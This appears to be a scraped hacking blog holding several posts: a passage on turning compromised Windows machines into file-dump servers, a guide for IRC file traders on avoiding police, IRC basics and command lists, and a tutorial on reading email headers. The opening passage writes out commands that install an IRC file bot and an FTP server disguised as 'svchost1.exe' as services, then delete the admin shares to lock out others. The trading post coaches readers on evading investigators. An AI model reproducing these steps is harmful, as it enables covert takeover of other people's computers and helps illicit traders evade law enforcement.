c:\winnt\system32\firedaemon -i iroff "c:\winnt\system32" "c:\winnt\system32\iroffer.exe" "xdcc.config" Y 0 0 0 Y
c:\winnt\system32\firedaemon -i servu "c:\winnt\system32" "c:\winnt\system32\svchost1.exe" "" Y 0 0 0 Y
c:\winnt\system32\firedaemon -i secur "c:\winnt\system32" "c:\winnt\system32\secur.exe" "" Y 0 0 0 Y
net start iroff
net start servu
net start secur
}

The "SECURE.BAT" looks something like this:
{
@echo off
net share /delete C$ /y >> net.deld
net share /delete D$ /y >> net.deld
net share /delete E$ /y >> net.deld
net share /delete F$ /y >> net.deld
net share /delete G$ /y >> net.deld
net share /delete H$ /y >> net.deld
net share /delete I$ /y >> net.deld
net share /delete J$ /y >> net.deld
net share /delete K$ /y >> net.deld
net share /delete L$ /y >> net.deld
net share /delete N$ /y >> net.deld
net share /delete O$ /y >> net.deld
net share /delete P$ /y >> net.deld
net share /delete Q$ /y >> net.deld
net share /delete R$ /y >> net.deld
net share /delete S$ /y >> net.deld
net share /delete T$ /y >> net.deld
net share /delete U$ /y >> net.deld
net share /delete V$ /y >> net.deld
net share /delete W$ /y >> net.deld
net share /delete X$ /y >> net.deld
net share /delete Y$ /y >> net.deld
net share /delete Z$ /y >> net.deld
net share /delete ADMIN$ >> net.deld
net share /delete IPC$ >> net.deld
}

IMPORTANT SITES:
X-SCAN: http://www.xfocus.org/
IROFFER: http://www.iroffer.org/
SERV-U: http://www.serv-u.com/
FIREDAEMON: http://www.firedaemon.com/
PSEXEC: http://www.sysinternals.com/ntw2k/freeware/psexec.shtml/
there at currently two popular site for searching the xdcc's
http://www.packetnews.com/
http://www.mydownloader.com/

IRC Trading

2008-12-10T23:05:00.000+07:00

Many people are not aware of security problems while sending and reciving files
(usualy known as 'trading' on mIRC), and since I am reasearching many security
topics, I have decided to write this security file which could keep you of you
jail. No bullshit!

1. Introduction
===============================================================================

I hope you are at least an mIRC user so you can understand what FSERVE or DCC
send/get and FTP servers are. If you don't know, learn fast: they are the net
protocols for file transfer between two computers that are connected through
internet. But they are ALL UNSAFE. Why?

You might have feeling that you are safe on IRC and that nobody knows your real
name since you nickname is not your real name and address, but.... The problem
is your IP number that is visible to ANY user (look on /whois your_nickname).
That IP number belongs to your ISP company and they know for 100% sure, from
which phone number are you calling and which IP number are you using for IRC and
all other Internet activity. With that information they can acctualy SEE all
data that is passing to and from you.

Well, you think that they can't intercept your private messages without a
warrant. But....... if you are trading/sending some files and if your ISP
company, based on existing police warrant, is monitoring your friend that you
trade with, then they SHALL remember you TOO and you will be reported as his
'friend'. After few days, weeks or even months when police decide to get in
action against your friend they will visit YOU too (no matter if you are in
another country then your friend, you will be visited by local police). What
will happend? They will get a warrant to search your ENTIRE house and they will
take your computer(s) and everthing other that is suspicious to them no matter
are you guilty or not and then you have only to wait several months or years for
them to complete investigation so that they can return you your computer(s). The
only thing left to you is to pick a good lawyer.

2. WHAT TO DO?
======================================================================================

**************************
Solution A) OpenSSH
**************************

Use secure Internet protocols like SFTP. SFTP is implemented into OpenSSH
project which includes both secure ftp SERVER and CLIENT utility (no Win98/95
version). Your ISP and police will see scrambled data going between you are and
your 'deviant' friend, and they will know EXACT identity of both of you, but
they could NOT tell to understand what were you sending to each other!!

To download Windows2K/NT version of OpenSSH server+client go to :

http://www.networksimplicity.com/openssh/

For other OS go to (there is no Win95/98 version):

http://www.openssh.com

***************************
Solution B) PGP mirc-script
***************************

Currently there is no Win95/98 version for OpenSSH, but the only solution would
be using PGP encryption. And I hope I will find some other utilities for next
edition. Someone might write PGP on-the-fly encryption script for mIRC.......

Homesite: http://web.mit.edu/network/pgp.html

Since there are many PGP pages, and some people are thinking that the
only realy secure PGP version is v2.6.2, be carefull what you download
and from where you download. I am suggesting to download all utilities
from realy democratic countries (not from: USA, western European
countries, poor countries that are depending on those rich
countries......)

***************************
Solution C) Legal Trick
***************************

If you have Win95/98 and you haven't solved secure file transfers there is one
plain trick that you could use to fool the cops. This is just last resort idea.
First: don't run RATIO ftp or fserve. Keep it open (but set password) so that
'anybody' who knows your password can freely download anything from it. Second:
put note on your site: "entering this site is forbidden by the owner and if you
proceede it would be considering like tresspassing private property, leave now".
So, police can't sue you for trading (file swaping is considering just like a
real trade, you recive something in return for offered goods). The only thing
police can sue you against, is the POSSESION of 'stuff' and the charges for
possesing that stuff is depending on your local laws. But if you are using some
encryption utility (read bellow) on your PC, they won't be able to get it.

***************************
If you have any new solutions for secure file transfers, MSG ME on mIRC.

3. ENCRYPTION UTILITIES FOR YOUR PC DATA (this is not for internet traffic encryption)
======================================================================================

Utility No.1 : SCRAMDISK
***************************

Excellent data encryption utility. Working through big file containers.

Specialty: it can encrypt entire PARTITIONS

Homepage: http://www.scramdisk.clara.net/

NOTE: there is new product on their site: DriveCrypt. Haven't checked.
Be carefull, it is not yet checked. In any product, there could be
backdoors so it is important to wait a few time before using it.

Utility No.2 : BestCrypt
***************************
Excellent data encryption utility. Working through big file containers.

Specialty: SWAP FILE encryption

Homepage: http://www.bestcrypt.com/

Accessing files that are into those encrypted 'file containers' is achived
through new drive letter that will appear when you enter required password.
Encryption is fast and I hope unbreakable (there is always chance for breaking,
but make it minimal). Also, you can install all your software (except Windows)
into those encrypted 'file containers'. This is recommended because of possibile
logs that some programs are writing to disk (or at least install your internet
utilities into encrypted file containers). Once you install above utilities, you
will use them for ever.

Gift for you if you are still reading this: you can make 650MB 'file
containers', burn them onto CD and send it to a friend and when he recives it,
you can send him a password through some secure ways (I am recomending you to encrypt
your message with your friends PGP public key when you are sending him your password).

4. EXTRA WARNINGS
======================================================================================

NOTE for password choosing: when you are choosing password for any special
encryption utility, and you are planning to protect realy important datas, don't
use WORD, use complete SENTENCE as a password.

Be carefull with FTP utilities. There are few that only encrypts FTP COMMAND channel,
but not DATA channel, which is the most important.

Also, forget protecting behind proxies since all traffic that is passing through
your computer and proxy server is NOT secured (encrypted!) unless you are using
payed proxies (which MAY encrypt traffic).

5. The End
======================================================================================

If you have any suggestion, please be free to msg me.

I am not affiliated with any site that I mentioned, including any other that I
haven't mentioned.

**********************************************************************
Put this message to your ftp/fserver and mark it as FREE download
**********************************************************************

Keep trading......... files are not hurting anybody except to those rich idiots.

What is an IRC network

2008-12-10T23:02:00.000+07:00

What is IRC?

IRC stands for Internet Relay Chat. It is a means of instant communication over the internet, such as instant messaging services (ie, MSN, Yahoo and ICQ), except that IRC can support an unlimited amount of anonymous or other users.

It was invented in 1988 and ran on small University servers with occasionally more than 10 users. It was based on usenet but in realtime. Users could send messages instantly to a server for all to read and reply to. But the history of IRC is unimportant.

What is an IRC network?

An IRC network is a collection of IRC servers, they act as one large server hosting many people in different locations. Each server is connected to the other so that IRC 'channels' or rooms are the same on each server, so person A on server A can talk to person B on server B, if you understand. Then benefits of multi server networks is that as well as allowing more users and speed in the event of a server crash everything should still run as normal. Once again, this is not important.

How do I connect to an IRC network?

To start with you will need some form of client. The client software comunicates with the IRC servers to send information back and forth. The most popular clients you will find are Java Applets and third party clients, such as mIRC.

Java Applets

These are very basic and lightweight. A typical java client will have a main message window a user list and a send message test box. Java clients are so lightweight as they are meant to be run directly off the internet, as quick as possible. Some java clients have more advanced options such as sound, emoticon pictures. Java applets are normally insecure, connect to only one server and with limited features so aren't the choice of the more l33t haxx0r5.

Java users:

Clicking on chat will take you to another page. Click on the "Chat" button and a windowed applet will appear.

The applet will load and take you to #MoTT'sDirtyMind, you will need to type: /msg NickServ Identify the replace your password with the one you chose when/if you registered your IRC nick.

If you don't like your name or forgot your password, type /nick .

Once your name is all sorted out and you are connected you will be forcefully thrown into #MoTT'sDirtyMind.

There are three main windows, the channel window (where people's text is output, this is more or less central), the user list (lists users in chat, on the right) and the text bar (which is below the channel and user windows). Just click on the text bar and type away, press enter to send text.

Next to the text box on the left are a load of colours and some letters (B, R, U and N). Clicking on the colours will change your text colour, clicking on a letter will give you bold text, underlined text, reverse your text's colours or return your text to normal.

Underneath these are two dropdown menus, actions and commands. Commands isn't important for the casual IRC user, but just to let you know, they give ou quick access to services such as NickServ. The actions menu performs automated /me options. Clicking on a users name then choosing an action will produce something such as:

* MoTT runs over rohitab lightly in a 4x4

Third Party Clients

These are permanent applications that allow connections to many servers quickly, easily, efficiently with many options and security. Other benefits of these applications are the use of proxy servers, multiple server connections, bots and functionality. The most common software for IRC browsing is mIRC by Khaled Mardam-Bey http://www.mirc.com

Most java applets are predefined for connection to specific servers, so there is little that can be said, simply choose a username and click connect.

mIRC users:

IRC applications however normally come with a list of proxy servers and allow the addition of extra servers. You should read your application's help guide for information on connecting and adding a server, I will however run through mIRC as this is the most popular:

1) When you run mIRC you will be greeted with a popup advertising mIRC, ignore this and click the X . The mIRC options, connections tab will be opened.

2) Before going anywhere, fill in the name, e-mail, nickname and alternative nickname forms. These details do not need to be correct.

3) Next choose your server from the second, larger dropdown box, if your server isn't there simply click Add. You will now have to fill out a form for the new server, choose a description/name for listing in the dropdown box, a server address and a port. Unless you are told otherwise by the server owner, there is no need to fill the group and password boxes in. Here is an example:

Description: IRChat
IRC Server: chat.irchat.tv
Port(s): 6666,6667
Group:
Password:

4) Now all you need to do is click OK then connect and you will be logged on. If however you want to connect to 2 or more servers at once, you must select the small 'New Server Window' option, this will connect to the server but keep your previous connections alive and running.

5) If your nick name is registered (more about this later) you will need to type: /msg NickServ Identify the replace your password with the one you chose when you registered your IRC nick.

If you don't like your name or forgot your password, type /nick .

6) Type /j #MoTT'sDirtyMind into any window and you will be taken there.

Registering your nickname

This is the same for both mIRC and the applet. It will stop others from using your nickname, simply type: /msg nickserv

and it will register your current name.

What Can I Do On IRC?

Logging on is the easy bit IRC nearly has it's own language (in fact, mIRC does have it's own language, which I will discuss later). The following commands should be compatible anywhere on IRC:

Basic Functions

/NICK

This will change you nick to whatever follows /nick for example: /nick MoTT_Rules would change your nick to 'MoTT_Rules' (NOTE: You are only allowed one word for your nick, therefore: /nick MoTT Rules would change your nick to 'MoTT'.

/JOIN <#CHANNEL>

Join's the specified channel: /join #rohitab would join channel rohitab (NOTE: Channel names must be prefixxed with a #). This command opens a new chat window (apart from on a few java clients).

/PART <#CHANNEL>

Leaves channel, closing the channel window, useage: /part #rohitab.

Chatting

Chatting is easy, when you are in a channel simply talk into your command box, this will just be a small text box, pressing enter will send the command. If you do not prefix commands with a forwardslash (/) IRC will interpret it as text and send it to your current channel.
Different chatting commands are:

/MSG

Sends a message to the specified user wherever they are on IRC (be it in channel or otherwise). For example, saying : /msg Manitou Hello World! would make a personal message popup in front of me containing the words 'Hello World'

/MSG <#CHAN>

Would send a message to the channel specified. For example, saying: /MSG #ROHITAB Hello World would cause the text 'Hello World' to be entered into channel rohitab (NOTE: the channel name must be prefixxed with a #).

/ME

This is an action, sometimes used as /action . '/ME slaps rohitab with a trout' would produce the following (if your name was Manitou): *Manitou slaps rohitab with a trout.

Advanced/Moderators Options

There are two types of police forces on IRC networks, moderators and ops. IRCOPS are always online and have moderator powers all over a network, it's rumoured they get paid...pretty well considering they only have to be online. Moderators are users appointed by channel founders to watch and for some reason moderate channels.
Moderators get extra IRCOP privelages (in their specified channels), these privelages are:

op/deop - change the moderator status of another user
voice/devoice - give or take users voice (voice allows users to talk when moderation is enabled, useful against spammers)
kick - kick a user from the channel
ban - ban a user temporarily or permanently from a channel

Bots are normally used in the moderation of a channel, they are server side and help manage bans and kicks. Bots normally include extra commands, but as each bot will be different I won't go into it. I will, however, point out that most bots will carry out a command if preceded with a ! so if you said: !kick Manitou and you were a channel moderator then Manitou (me) would be kicked.

The basic moderator commands for IRC are easy to use, as this you should have a better understand, I will not add any comments:

Opping a user: /mode <#channel> +o

Deopping a user: /mode <#channel> -o

Voicing a user: /mode <#channel> +v

Devoicing a user: /mode <#channel> -v

Kicking a user: /kick <#channel> (NOTE: if no channel is given, it will accept the command to the active channel).

Kicking a user with a reason: /kick <#channel> Any text that follows he username in a kick will be used as a reason.

Banning a user: /mode <#channel> +b

Bots allow timed bans and exceptions.

For mIRC users all of these commands are available by right clicking on a users name in the user list.

If you want to know more about IRC read my guide to Epona services, a set of services used on the IRChat network.

IRC Basic Commands

2008-12-10T22:55:00.001+07:00

/alias Alias_name Command Creates a command alias with an existing command
/channel #channel_name Joins the channel #channel_name
/clear Clears the display
/ctcp nick command Executes some special commands (PING, FINGER, VERSION,
TIME, USERINFO, CLIENTINFO)
/invite #channel nickname Invites nickname on #channel
/kick #channel_name nickname Ejects nickname from #channel_name (needs to
be an operator)
/leave #channel_name Quits the channel #channel_name
/list Shows the list of channels (can be very slow)
/lusers Shows statistics for server
/map Shows all servers connected
/me message Does the action specified by message on the channel
/mode mask Changes the mode for the channel or for a nick (you need to be
op on the channel)
/motd Shows the Message Of The Day
/msg nickname message Sends a private message to nickname

/names Shows the list of people connected (can be very slow)
/nick nickname Changes the nick to nickname
/notify nickname Prints message when nickname connects/disconnects
/query nickname Allows a particular chat with nickname
/quit message Disconnects from undernet
/quote command Sends command directly to the server
/raw command Same as /quote
/topic #channel [text] Shows [Changes] the topic on #channel
/who mask Shows people matching the mask (can be a channel)
/whois nickname Shows information on nickname

Howto Read Email Header

2008-12-10T20:36:00.001+07:00

Now some of you may think that headers are too simple or boring to waste
time on. However, a few weeks ago I asked the 3000+ readers of the Happy
Hacker list if anyone could tell me exactly what email tricks I was playing
in the process of mailing out the Digests. But not one person replied with a
complete answer -- or even 75% of the answer -- or even suspected that for
months almost all Happy Hacker mailings have doubled as protests. The

targets: ISPs offering download sites for email bomber programs. Conclusion:
it is time to talk headers!

In this Guide we will learn:
· what is a header
· why headers are fun
· how to see full headers
· what all that stuff in your headers means
· how to get the names of Internet host computers from your headers
· the foundation for understanding the forging of email and Usenet posts,
catching the people who forge headers, and the theory behind those email
bomber programs that can bring an entire Internet Service Provider (ISP) to
its knees

This is a Guide you can make at least some use of without getting a shell
account or installing some form of Unix on your home computer. All you need
is to be able to send and receive email, and you are in business. However,
if you do have a shell account, you can do much more with deciphering
headers. Viva Unix!

Headers may sound like a boring topic. Heck, the Eudora email program named
the button you click to read full headers "blah blah blah." But all those
guys who tell you headers are boring are either ignorant -- or else afraid
you'll open a wonderful chest full of hacker insights. Yes, every email
header you check out has the potential to unearth a treasure hidden in some
back alley of the Internet.

Now headers may seem simple enough to be a topic for one of our Beginners'
Series Guides. But when I went to look up the topic of headers in my library
of manuals, I was shocked to find that most of them don't even cover the
topic. The two I found that did cover headers said almost nothing about
them. Even the relevant RFC 822 is pretty vague. If any of you
super-vigilant readers looking for flame bait happen to know of any
literature that *does* cover headers in detail, please include that
information in your tirades!

*********************************************
Technical tip: Information relevant to headers may be extracted from
Requests for Comments (RFCs) 822 (best), as well as 1042, 1123, 1521 and
1891 (not a complete list). To read them, take your Web browser to
http://altavista.digital.com and search for "RFC 822" etc.
*********************************************

Lacking much help from manuals, and finding that RFC 822 didn't answer all
my questions, the main way I researched this article was to send email back
and forth among some of my accounts, trying out many variations in order to
see what kinds of headers they generated. Hey, that's how real hackers are
supposed to figure out stuff when RTFM (read the fine manual) or RTFRFC
(read the fine RFC)doesn't tell us as much as we want to know. Right?

One last thing. People have pointed out to me that every time I put an email
address or domain name in a Guide to (mostly) Harmless Hacking, a zillion
newbies launch botched hacking attacks against these. All email addresses
and domain names below have been fubarred.

************************************************
Newbie note: The verb "to fubar" means to obscure email addresses and
Internet host addresses by changing them. Ancient tradition holds that it is
best to do so by substituting "foobar" or "fubar" for part of the address.
************************************************

WHAT ARE HEADERS?

If you are new to hacking, the headers you are used to seeing may be
incomplete. Chances are that when you get email it looks something like this:

From: Cool Guy
Date: Fri, 1 March 2002
To: hacker@techbroker.com

But if you know the right command, suddenly, with this same email message,
we are looking at tons and tons of stuff:

Received: by o200.fooway.net (950413.SGI.8.6.12/951211.SGI)
for techbr@fooway.net id OAA07210; Fri, 1 March 2002
Received: from ifi.foobar.no by o200.fooway.net via ESMTP
(950413.SGI.8.6.12/951211.SGI)
for id OAA18967; Fri, 1 March 2002
Received: from gyllir.ifi.foobar.no (2234@gyllir.ifi.foobar.no
[129.xxx.64.230]) by ifi.foobar.no with ESMTP (8.6.11/ifi2.4)
id for ; Fri, 1 March 2002
From: Vegbar Fubar
Received: from localhost (Vegbarha@localhost) by gyllir.ifi.foobar.no ; Fri,
1 March 2002
Date: Fri, 1 March 2002
Message-Id: <199704111809.13156.gyllir@ifi.foobar.no>
To: hacker@techbroker.com

Hey, have you ever wondered why all that stuff is there and what it means?
We'll return to this example later in this tutorial. But first we must
consider the burning question of the day:

WHY ARE HEADERS FUN?

Why bother with those "fucking" headers? They are boring, right? Wrong!

1) Ever hear a wannabe hacker complaining he or she doesn't have the
addresses of any good computers to explore? Have you ever used one of those
IP scanner programs that find valid Internet Protocol addresses of Internet
hosts for you? Well, you can find gazillions of valid addresses without the
crutch of one of these programs simply by reading the headers of emails.

2) Ever wonder who really mailed that "Make Money Fast" spam? Or who is that
klutz who email bombed you? The first step to learning how to spot email
forgeries and spot the culprit is to be able to read headers.

3) Want to learn how to convincingly forge email? Do you aspire to write
automatic spam or email bomber programs? (I disapprove of spammer and email
bomb programs, but let's be honest about the kinds of knowledge their
creators must draw upon.) The first step is to understand headers.

4) Want to attack someone's computer? Find out where best to attack from the
headers of their email. I disapprove of this use, too. But I'm dedicated to
telling you the truth about hacking, so like it or not, here it is.

HOW CAN YOU SEE FULL HEADERS?

So you look at the headers of your email and it doesn't appear have any good
stuff whatsoever. Want to see all the hidden stuff? The way you do this
depends on what email program you are using.

The most popular email program today is Eudora. To see full headers in
Eudora, just click the "blah, blah, blah" button on the far left end of the
tool bar.

The Netscape web browser includes an email reader. To see full headers,
click on Options, then click the "Show All Headers" item.

Sorry, I haven't looked into how to do that with Internet Explorer. Oh, no,
I can see the flames coming, how dare I not learn the ins and outs of IE
mail! But, seriously, IE is a dangerously insecure Web browser because it is
actually a Windows shell. So no matter how often Microsoft patches its
security flaws, chances are you will be hurt by it one of these days. Just
say "no" to IE.

Another popular email program is Pegasus. Maybe there is an easy way to see
full headers in Pegasus, but I haven't found it. The hard way to see full
headers in Pegasus -- or IE -- or any email program -- is to open your mail
folders with Wordpad. It is included in the Windows 95 operating system and
is the best Windows editing program I have found for handling documents with
lots of embedded control characters and other oddities.

The Compuserve 3.01 email program automatically shows full headers. Bravo,
Compuserve!

WHAT DOES ALL THAT STUFF IN YOUR HEADERS MEAN?

We'll start by taking a look at a mildly interesting full header. Then we'll
examine two headers that reveal some interesting shenanigans. Finally we
will look at a forged header.

OK, let us return to that fairly ordinary full header we looked at above. We
will decipher it piece by piece. First we look at the simple version:

From: Cool Guy
Date: Fri, 1 March 2002
To: hacker@techbroker.com

The information within any header consists of a series of fields separated
from each other by a "newline" character. Each field consists of two parts:
a field name, which includes no spaces and is terminated by a colon; and the
contents of the field. In this case the only fields that show are "From:,"
"Date:," and "To:".

In every header there are two classes of fields: the "envelope," which
contains only the sender and recipient fields; and everything else, which is
information specific to the handling of the message. In this case the only
field that shows which gives information on the handling of the message is
the Date field.

When we expand to a full header, we are able to see all the fields of the
header. We will now go through this information line by line.

Received: by o200.fooway.net (950413.SGI.8.6.12/951211.SGI)for
techbr@fooway.net id OAA07210; Fri, 1 March 2002

This line tells us that I downloaded this email from the POP server at a
computer named o200.fooway.net. This was done on behalf of my account with
email address of techbr@fooway.net. The (950413.SGI.8.6.12/951211.SGI) part
identifies the software name and version running that POP server.

********************************************
Newbie note: POP stands for Post Office Protocol. Your POP server is the
computer that holds your email until you want to read it. Usually your the
email program on your home computer or shell account computer will connect
to port 110 on your POP server to get your email.
A similar, but more general protocol is IMAP, for Interactive Mail Access
Protocol. Trust me, you will be a big hit at parties if you can hold forth
on the differences between POP and IMAP, you big hunk of a hacker, you!
(Hint: for more info, RTFRFCs.)
********************************************

Now we examine the second line of the header:

Received: from ifi.foobar.no by o200.fooway.net via ESMTP
(950413.SGI.8.6.12/951211.SGI)for id OAA18967; Fri,
1 March 2002

Well, gee, I didn't promise that this header would be *totally* ordinary.
This line tells us that a computer named ifi.foobar.no passed this email to
the POP server on o200.fooway.net for someone with the email address of
hacker@techbroker.com. This is because I am piping all email to
hacker@techbroker.com into the account techbr@fooway.net. Under Unix this is
done by setting up a file in your home directory named ".forward" with the
address to which you want your email sent. Now there is a lot more behind
this, but I'm not telling you. Heh, heh. Can any of you evil geniuses out
there figure out the whole story?

"ESMTP" stands for "extended simple mail transfer protocol." The
"950413.SGI.8.6.12/951211.SGI" designates the program that is handling my email.

Now for the next line in the header:

Received: from gyllir.ifi.foobar.no (2234@gyllir.ifi.foobar.no
[129.xxx.64.230]) by ifi.foobar.no with ESMTP (8.6.11/ifi2.4) id
for ; Fri, 1 March 2002

This line tells us that the computer ifi.foobar.no got this email message
from the computer gyllir.ifi.foobar.no. These two computers appear to be on
the same LAN. In fact, note something interesting. The computer name
gyllir.ifi.foobar.no has a number after it, 129.xxx.64.230. This is the
numerical representation of its name. (I substituted ".xxx." for three
numbers in order to fubar the IP address.) But the computer ifi.foobar.no
didn't have a number after its name. How come?

Now if you are working with Windows 95 or a Mac you probably can't figure
out this little mystery. But trust me, hacking is all about noticing these
little mysteries and probing them (until you find something to break,
muhahaha -- only kidding, OK?)

But since I am trying to be a real hacker, I go to my trusty Unix shell
account and give the command:

>nslookup ifi.foobar.no

Server: Fubarino.com
Address: 198.6.71.10

Non-authoritative answer:
Name: ifi.foobar.no
Address: 129.xxx.64.2

Notice the different numerical IP addresses between ifi.foobar.no and
gyllir.ifi.foobar.no. Hmmm, I begin to think that the domain ifi.foobar.no
may be a pretty big deal. Probing around with dig and traceroute leads me to
discover lots more computers in that domain. Probing with nslookup in the
mode "set type=any" tells me yet more.